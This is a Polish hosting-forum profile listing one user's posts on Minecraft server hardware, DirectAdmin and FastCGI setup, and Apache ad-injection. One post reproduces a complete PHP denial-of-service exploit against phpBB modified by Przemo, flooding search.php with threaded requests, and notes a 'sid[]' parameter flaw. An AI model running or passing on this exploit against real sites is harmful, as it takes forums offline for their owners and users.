Skocz do zawartości

t4t4v4

WHT Pro
  • Zawartość

    373
  • Rejestracja

  • Ostatnio

  • Wygrane dni

    6

Wszystko napisane przez t4t4v4

  1. Pyk: http://www.kimsufi.pl/vks/index.xml'>http://www.kimsufi.pl/vks/index.xml Pyk: http://www.kimsufi.pl/ Polska: http://ncgroup.pl/engine/?6,serwer-vps-vmware http://www.slaskdatacenter.pl/dedykowane.html A najlepiej w przypadku MC to trzymać się zagranicy i nie przepłacać w PL, bo niskie opóźnienia są tutaj zbędne..
  2. Haha "Najlepiej i7" Jak chcesz Pan ciągnąć MC to polecam się przerzucić na serwerowe Xeon'y a nie deskoptowe procesory.. Bierz kolejny "level" z OVH: https://www.ovh.pl/serwery_dedykowane/eg_ssd.xml - nie będziesz narzekać, że coś tnie.
  3. Transfer - Minecraft i Cs 1.6

    Łącze nie problem, MC wymaga super pingów. Na 1Mbps przypada 8 graczy - ciągle aktywnych, kopiących, wyrzucających przedmioty, piszących, budujących itp itd - testowane na produkcyjnym, prywatnym serwerze. Oranie dysku, problem z IO? Wystarczy przeznaczyć 2-3GB RAM pod ramdysk i wrzucać tam mapy świata - a to zrzucać co 5-10 minut na HDD/SSD. Jeden gracz to 54MB RAMu - tak wychodzi rzeczywiście, przy serwerze pełnym wtyczek i graczy. Teoretycznie zakłada się 64MB/gracz. Strzelam, że 3TB transferu wystarczą, zawsze można dokupić
  4. Vulnerability in cookie "_sid" and method GET sid: http://example.com/login.php?sid[]= or put to the cookie "_sid": bb8536eb00_sid[]=12345 DoS: <?php ################################################################################ # Exploit Title: phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1 # # Software phpBB modified by Przemo 1.12.6p4 # Date: 2010-04-29 # Author: GLOBUS # Software Link: http://www.przemo.org/phpBB2/ # Version: <= 1.12.6p4 # category: DoS # # Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka ################################################################################ // cURL and PHP5 function info() { echo "##################################################################\n"; echo "# phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1\n"; echo "# Author: GLOBUS\n"; echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka\n"; echo "##################################################################\n"; echo "# php dos.php URL THREADS TIMEOUT\n"; echo "# php dos.php http://www.example.pl/phpbb/ 20 5\n"; echo "##################################################################\n"; exit; } if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3])) { info(); } $url = $argv[1]; $threads = (int) $argv[2]; $timeout = (int) $argv[3]; $ptimeout = $timeout * 100; $packet = implode('+', range(100,999)); while(1) { $m = curl_multi_init(); for($i = 0; $i < $threads; $i++) { $c[$i] = curl_init(); $opts = array ( CURLOPT_URL => $url . 'search.php?mode=results', CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52', CURLOPT_ENCODING => 'gzip, deflate', CURLOPT_POST => 1, CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'&search_terms=all&search_author=&search_time=0&search_fields=all&show_results=posts&sort_by=2&sort_dir=DESC&return_chars=-1', CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => $timeout, ); curl_setopt_array($c[$i], $opts); curl_multi_add_handle($m, $c[$i]); } $t = 0; do { curl_multi_exec($m, $r); usleep(100000); $t++; if($t > $ptimeout) { curl_multi_close($m); for($i = 0; $i < $threads; $i++) { curl_close($c[$i]); } break; } } while($r > 0); echo '.'; } ?> Na wersji 1.12.6p4 działały oba a z tego co wiem to najnowsza wersja. Co do DoSa to można go było prosto wyciąć przez nałożenie limitu na MySQL czy nawet banowanie na kilka minut takiego delikwenta, który stosuje generuje tyle żądań. Miłego weekendu!
  5. DOS, DDOS w Atmanie?

    @Up a czy to coś dziwnego, że DC wycinają IPki po otrzymaniu maila?
  6. DOS, DDOS w Atmanie?

    Zresztą.. Sztuczny ruch pakietów (DoS, DDoS) powinien zostać po drodze trasy pomiędzy atakującym a Twoim serwerem, jeśli tak nie jest to pisze się do ATMAN'a prośbę o wycięcie tego adresu.
  7. VPS na kimsufi

    Kafi mógłbyś powiedzieć coś więcej na ten temat? Masz na myśli możliwość ograniczania IO/s dla danej maszyny wirtualnej?
  8. VPS na kimsufi

    Jeśli postawimy mapę świata na zwykłych HDD, nawet w RAID0 (oczywiście setki graczy) to serwer nam wygeneruje tak dużą ilość IO, że wszystko się pozatyka. Wiem to zarówno z własnych doświadczeń i testów jak i z tego co można przeczytać w Internecie. Dyski SSD radzą sobie już znacznie lepiej z utrzymywaniem mapy, jednak też wypada je mieć w macierzy co by jeszcze bardziej przyspieszyć operacje odczytu i zapisu. Zdecydowanie najlepszym rozwiązaniem jest skorzystanie z ramdysku i przeznaczenie np. 4GB pamięci RAM tylko i wyłącznie na światy serwera i zgrywanie ich raz na 15 minut na HDD. Opisałem to na wielu forach i "sprzedałem" taki pomysł wielu ludziom - serwery przestały mulić, mogły obrobić większą ilość graczy w tym samym czasie, komfort gry znacznie wzrósł. EDIT: Jeśli to są VPSy od OVH to pewnie stoją w jakimś klastrze i MineCraft nie powinien być dla nich problemem Pisząc to co wyżej miałem na myśli serwery gier postawione na jednej fizcznej maszynie.
  9. @mikorol patrz Ty się, nawet PHP uciągnąłem przy takiej ilości pamięci @Misiek08 popieram, sam mam tak zrealizowane trzymanie kilku malutkich stronek i sprawuje się elegancko. KVM to typ wirtualizacji opartej o jądro systemu Linux.
  10. VPS na kimsufi

    Można prosić o linka do oferty? Jeśli będzie na tych maszynach masa bezmózgich administratorów MineCrafta to strzelam, że dyski zostaną zajechane a właściciele oferty zabronią stawiania MC ^^
  11. Tylko i wyłącznie phpBB3 Na Przemka istnieje masa explotiów wykorzystujących błędy w wywołaniach do MySQL i łatwo go zatkać. phpBB3 daje Ci zdecydowanie większą szybkość, bezpieczeństwo i łatwość w instalacji szerokiej gamy modyfikacji i szablonów.
  12. DOS, DDOS w Atmanie?

    CloudFlare to super rozwiązanie dla dostawców hostingu. Można używać dużo słabszych maszyn, gdyż CF cache'uje nam strony i obniża ilość odwołań do głównego serwera WWW. CF ukrywa także nasz prawdziwy adres IP przez co można uniknąć ataków typu DDoS. CF pomaga w przenoszeniu się między serwerami (a raczej adresami), gdyż natychmiastowo aktualizuje sobie rekordy A. CF przestaje jednak działać, gdy ktoś pozna nasz adres i będzie atakować bezpośrednio po nim, nie używając do tego celu nazwy hosta.
  13. Witajcie! Znacie jakiś moduł do Indianina, który doklejałby kod reklamy do stron? Tak jak ma to miejsce na yoyo.pl, cba.pl, ugu.pl i innych darmowych hostingach. Jeśli tak, to proszę o propozycje. Pozdrawiam!
  14. Hej! Po aktualizacji DirectAdmina do najnowszej wersji (PHP 5.3.8 i MySQL 5.5.18), gdy chcę wejść w "Zarządzanie MySQL" dostaję błąd segmentation fault. Error log: Zrzut pamięci (debug): Ktoś ma pomysły jak to załatać? apt-get upgrade + custombuild php i MySQL? Edit: Nowi użytkownicy nie mają tego błędu. Ci, którzy przeszli z wersji 1.39 mają błąd.
  15. Witajcie! Chcę zrobić pakiet, w którym wszyscy użytkownicy będą mieć reklamy na stronie. Więc posłużyłem się: http://www.directadmin.com/features.php?id=479 i http://help.directadmin.com/item.php?id=299 Zawartość pliku custom_package_items.conf: reklamy=type=checkbox&string=Reklamy na stronie&desc=Reklamy na stronie&checked=no Zaznaczanie funkcji "reklama" działa i jest dodawana linijka do pliku: /usr/local/directadmin/data/users/testowo/users.conf reklama=ON Do niektórych plików httpd.conf zależnie od zaznaczenia opcji "reklamy" chcę dodawać następujący kod: LayoutIgnoreURI *.rss LayoutIgnoreURI *.xml LayoutIgnoreURI *.raw AllowOverride All AddOutputFilter LAYOUT html htm shtml php LayoutComment Off LayoutFooter /home/reklama.html Więc w templatkach virtual hostów dodałem pomiędzy <Directory>: |*if reklamy="ON"| LayoutIgnoreURI *.rss LayoutIgnoreURI *.xml LayoutIgnoreURI *.raw AllowOverride All AddOutputFilter LAYOUT html htm shtml php LayoutComment Off LayoutFooter /home/reklama.html |*endif| Gdy wrzucę użytkownikowi ręcznie kod dodający reklamę, wszystko działa. Gdy dodam nowego użytkownika z zaznaczoną "reklamą" (reklama=ON) to nie dodaje mi tego do httpd.conf Wie ktoś o co może chodzić?
  16. Właśnie wiedziałem, że coś z "layout" w nazwie, szukałem szukałem i mam: http://wannabe.guru.org/scott/hobbies/apache/ sposób działa w 100%. Jeszcze dziś zadam kolejne pytanie, ale to już w innym temacie. Pozdrawiam
  17. Działa. Limity limitują hardcorowo: Bez limitu czas wykonywania pewnego skryptu 2,7s 50% - 5,8s 5% - 50s Miłego dzionka
  18. To jest VPS na VMWare z jednym fizycznym rdzeniem dla mnie. Rano skompiluję sobie cpulimit, może to coś pomoże. Jeszcze raz dzięki wszystkim za pomoc, dobrej nocki!
  19. Panocki! Wykorzystując mój geniusz.. Joke, to wszystko dzięki Wam! Skleciłem taki skrypt z dwóch skryptów: #!/bin/sh for username in `ls /usr/local/directadmin/data/users`; do { mkdir -p /fcgi/${username}/public_html cp /usr/local/directadmin/scripts/custom/fcgid.sh /fcgi/${username}/public_html/fcgid.sh && chmod 0700 /fcgi/${username}/public_html/fcgid.sh cp /usr/local/directadmin/scripts/custom/php.ini /fcgi/${username}/public_html/php.ini perl -pi -w -e "s/PHPCFG_BASEDIR/\/home\/${username}\//g;" /fcgi/${username}/public_html/php.ini chown -R ${username}:${username} /fcgi/${username} } done; Po nadaniu uprawnień wszystko ruszyło od kopa. Elegancko działa. PHPInfo mówi: Więc FastCGI działczy? Może odejdę od tematu: jak nałożyć limity CPU na wykonywanie skryptów? Próbowałem tak (starter fcgid.sh): #!/bin/sh export PHP_FCGI_MAX_REQUESTS=0 exec cpulimit -P /usr/local/php5/bin/php-cgi -l 5 Skrypt jest wykonywany chyba w nieskończoność, strona nie ładuje się - jak zrobić to poprawnie? Edit: Pomęczyłem, pomęczyłem i doszedłem: #!/bin/sh PHPRC="~" export PHPRC export PHP_FCGI_CHILDREN=1 exec (cpulimit -P /usr/local/php5/bin/php-cgi -l 10) Za pomoc zapraszam do Zamościa na browarka EDIT: Starter z CPULimit niby odpala skrypty PHP ale w ogóle nie limituje procka. Co z tym fantem zrobić?
  20. Dobrze, różnią się uid/gid ale nie różnią się zawartością. Czy takie uruchamianie z oddzielnych starterów jest bezpieczniejsze niż z jednego wspólnego (po zmodyfikowaniu źródła suexeca)?
  21. Właśnie, tak poza tematem (dziś w nocy jeszcze będę męczyć i dam znać) - dlaczego każdy użytkownik musi mieć oddzielny skrypt startowy (fcgid.sh) skoro one niczym się nie różnią? Mi to w sumie w niczym nie przeszkadza, ale pytam z czystej ciekawości
  22. Nikt nigdzie nie wspominał o edycji źródła i ponownel kompilacji.. O co chodzi?
  23. Czyli to błąd wywołany brakiem uprawnień i to powinno dopomóc: cd /usr/local/directadmin/scripts && ./set_permissions.sh find /home/*/domains/*/p*_html -type d -print0 | xargs -0 chmod 711 find /home/*/domains/*/p*_html -type f -print0 | xargs -0 chmod 644 W nocy popróbuję z uprawnieniami i grupami i dam znać
×